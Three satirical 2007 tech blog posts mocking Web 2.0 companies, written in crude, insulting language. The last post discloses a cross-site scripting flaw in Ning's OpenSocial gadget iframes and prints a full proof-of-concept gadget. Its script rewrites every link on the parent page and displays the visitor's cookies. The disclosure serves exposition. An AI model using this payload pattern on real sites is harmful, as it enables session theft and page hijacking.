Shattering Inanity

Posted by harold at November 22nd, 2007

Okay so actually, Phil (my neighborhood crack dealer) mentioned that there are still a couple of tech companies out there. And I mean organizations that actually are results-oriented rather than wasting-peoples’-time-on-stupid-stuff oriented. Yes, I know it’s hard to believe. One of better performing (well, before this week’s stock disaster) firms is VMware. As anyone with half a brain knows, VMware is a software company with a focus on delivering virtualization solutions on x86 architecture PCs. Based off research done in Mendel Rosenblum’s research group at Stanford back in the late 90’s, VMware completely changed the face of machine virtualization by offering blazing fast speeds on quirky commodity hardware (interested in the details? Read this paper). But it’s not all fun and games and fairies and daises and lightly salted french fries. The x86 architecture with all its quirks is not naturally virtualizable under Popek’s and Goldberg’s canonical definition. To be naturally virtualizable, all privileged or sensitive instructions must generate a trap. On x86, there are at least 17 instructions in the base instruction set which violate this key property. As a result, trying to correctly virtualize the x86 is equivalent to attempting to drive a Yugo through Death Valley. Oh sure you can do it, but you’ll probably break down after about 10 feet. 11 and a half if you’re lucky. VMware claims their virtual machine is totally isolated, but hey, we all know it’s only a matter of time before someone breaks the isolation. Now I know legend has it that they convinced the NSA to use VMware… but I also happen to know that my old buddies at the NSA loved to claim they internally used products which in reality they knew exactly how to crack. Hehe.

Oh yeah so anyway, another one of these technology-oriented companies based in the Valley is Coverity. You might need three quarters of a brain to have heard of them, since they’re developer-oriented (half a brain and a quarter pounder with swiss would probably work too). This company produces tools which perform source code analysis in order to improve the software development process. Sounds like a pretty big deal to me… as we all know, bugs in software love to cause problems. However, your average VC didn’t see it that way. For example, rather than providing capital to Coverity, Sequoia decided to pour money into stupid little abominations like TokBox, which is a startup that combines the power of rounded corners and the built-in video and webcam support in Flash. Rather than thinking, Sequoia decided to throw good money at an inconsequential little trinket, and now they’re paying for it (I’ve heard the TokBox team is, ahem, “brilliant”). Coverity, on the other hand, has managed to grow to a respectable level of profitability based on, no not ads, certainly not VC funding… wait for it… innovations that deliver true value to customers. Hint to VCs: next time you see a company that’s developed innovative tools for finding ever more of those nasty bugs lurking in our code bases–give THEM the money! Not the guy who invented arsenic-flavored chalk candybars.

Well folks, we’ve gone through the bad, we’ve glimpsed at the good that remains. Now it’s up to all of us to decide whether the tech industry goes in the gutter or goes for the gold. It’s a simple decision, surely. But executing on it executing on it just seems to be a little too difficult given the apparent rampancy of zombies in the Valley today.

Posted by harold at November 14th, 2007

Facebook. Digg. Google. Three companies I’ve heard way too much about this past week. Oddly enough, those names all have at least three things in common (good things come in threes… yeah right): they’re headquartered in the San Francisco Bay Area, they depend on the social factor (read: the online equivalent of STDs), and finally, they’re all wrapped up in the whole advertising thing. Not to mention, out of the three companies I mentioned, only Google ever even had any technology worth mentioning to back up their infamy. Of course Google too is now practically cruising on search and spending ridiculous wads of cash on promoting other projects (read: AdSense). This whole Web 2.0 mindset of “we need more ads to get more money” has quite tragically far surpassed all true innovation in the Valley.

Google is not the worst offender in this market. Earlier this week in New York City, Facebook announced its Social Ads program, which is apparently a behavioral-targeting system for advertisers. Every time some worthless syphilis-infected Facebook user decides to buy some useless trinket, a notification of that purchase will be broadcast across their Facebook buddies’ news feeds. Sounds great doesn’t it? As if Facebook weren’t already privacy invasion central. Of course all the company executives invited to the launch event loved the idea. Even my local crack dealer down on the corner told me this “will give Google a run for its money.” And speaking of coke, now you can even add products like Coca-Cola as your dearest dearest friend. Thanks Facebook! I don’t know about you, but when was the last time you considered your can of Coke “social?” I mean heroin or something, sure. But soda pop?

All those ads-that-pay-for-everything are pretty stupid. So’s all the attention surrounding these halfwit Web 2.0 startups. Recently, everybody was circulating rumors about how Digg was considered to be an acquisition target by Yahoo. Who gives a damn? Digg is just another web startup with a pretty large user base submitting stories. Heck, if you added up the IQs of all of its users, it may even be a little above 10 by now. Hallelujah! What’s the difference between Digg and a waterlogged phonebook? Not a whole lot. I’d much rather be pruning my exquisite collection of Bonsai Trees. With fingernail clippers, no less.

But this all brings up some bigger questions: what’s wrong with this picture? What has happened to technology? Half a century after the rise of Silicon Valley as a breeding ground for innovative technology-oriented companies, have we hit a pothole the size of Jupiter? Is this the best Silicon Valley can come up with? Top tier companies fighting over advertising surface area for Joe-Bob’s snail training guide and “Enlarge Your Leprechaun in 35 Days!”? Whatever happened to the legendary competition between AMD and Intel, E. coli and Jack in the Box, heck evem Netscape and Microsoft’s (incredibly lame) Internet Explorer? Quite plainly, the Valley has been flooded with yet-another-poorly-designed-web-2.0-social website (and clones thereof). Where have all the techboys gone?

To be continued…

Posted by harold at November 3rd, 2007

Friends. Romans. People with half a brain. It’s finally happened: Google’s opened the floodgates to ubiquitous bad taste, annoyances, and exploits across all social networking platforms, ranging from Ning to MySpace to the Iranian Goat Farmers’ Association. If you’ve been following the tech news lately, you’re probably aware that Google and his merry band of transvestites released the abomination known as the OpenSocial API this past Thursday. I understand that sounds like a pretty rash statement—I do get a rash some times—but this time I’m going to back it up with the facts and let you decide, doc.

It all started with a neat little trinket known as Google Gadgets. If you’re the sort of person who doesn’t give a damn about personal privacy, I’m sure you’ve used iGoogle, which allows you to put all kinds of nice little gadgets on your Google home page. Ok, even I use it—it’s just way too handy being able to check the weather and gas prices without even stepping outside! But you know, then I got hacking, and things didn’t look so hot anymore… any gadget that you add can run arbitrary javascript in your browser, and if you create a gadget using the “html-inline” content mode, it can even radically alter the structure of the iGoogle home page! So I tried that, and boy was I relieved when it gave me an extra little warning that I brashly clicked through to get my widget onto my home page… but hey, whatever I put on my iGoogle is my fault. It’s my customization.

On the other hand, social networks—at least amongst the non-retard/myspace set—very wisely have thus far constrained the format of peoples’ profiles. You get maybe a picture, some work history, and some stupid little details about how the person’s a big loser that nobody cares about. Maybe some trite comments from so-called “friends.” But with OpenSocial…? Perhaps you should take a look at my niece’s handiwork. Sorry, she’s not that stupid, I actually made that page myself (got you back, Berli!). Anyway, you see that little box o’ seizures titled “preaty culrz!”? It’s a Google Gadget in full glory.

But it gets worse than that, friends. That little Google Gadget could actually be a lot nastier than it looks, because it’s an “html-inline” component… when I add it on iGoogle, it makes my whole page background nauseatingly flashy. Ning is actually shielding your eyes by ignoring the fact that it’s an “html-inline” component—and forcing the box o’ seizures to be rendered in an iframe. But wait a minute. Where’s that iframe being loaded from?? Let’s take a gander at the source to Berlinetta’s page:

<iframe id="embeddingFrame" ...
src="/gadgets/index/gadgetWrapper?url=http%3A%2F%2Fhosting.gmodules.com%2Fig%2Fgadgets%2Ffile%2F107691354973556300155%2Fsplendid.xml&ownerName=18wefqtay110x&mode=profile">
</iframe>

Splendid! If you view the source of gadgetWrapper with the url argument, you’ll notice that the code of the Gadget is inserted into the gadgetWrapper page on the server side. Those Web 2.0 wizards just left the front gates unlocked and well-oiled, ready to be swung right open. Now what if, purely hypothetically, one of Berlinetta’s puckish little friends happened to oh, push the gate open and walk in? But we don’t have to wonder, we can know.

Yes dudes, that’s right: that innocent looking little gadget purportedly describing a delicious extract of mulberry actually extracts your delicious cookies and rewrites all of the hyperlinks on the page. I could have been more devious about it, but remember, my goal here is merely exposition of how much Web 2.0 sucks. In case you missed it, here’s the link to the page with the exploit, and here’s the exploitive little gadget itself:

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Splendid!" />
<Content type="html"><![CDATA[
<script language="javascript">

function exploit() {
  var doc = window.top.document;
  var a = doc.getElementsByTagName('a');
  for (var i = 0; i < a.length; i++) {
    if (a[i].hasAttribute('href')) {
      a[i].setAttribute('href',
        'http://www.haroldtherebel.com/2007/11/03/peer-prescience/');
    }
  }
  document.getElementById('done').innerHTML
  = document.cookie;
}

</script>
<font color="#ffffff"><form>
<center>Click this button to make all of the links
        on this page go to haroldtherebel.com:<br/>
<input type="button" onclick="exploit();"
       value="Exploit now!"><br/>
cook-ease:<br/>
<textarea id="done" rows="10" cols="60"></textarea></center>
</form></font>
]]></Content>
</Module>

The exploit really stands for itself, but let me point out the magic line: “var doc = window.top.document;” This says “yeah, I know I’m a measly little iframe, but just forget that and give me access to the whole document.” If the iframe comes from the same server as the main page, your browser is more than happy to honor that request. Hence the gate swings open. The floodgates of antisocial behavior, opened courtesy of OpenSocial. Good job Ning, Google, and everybody else! Rah-rah Web 2.0! Cross-site scripting makes you strong and healthy like a beluga whale!

Yeah, I’m sure that stuff is worth billions. Sorry, I’d put my money on a factory full of slave laborors making tennis shoes in south-east Asia anyday.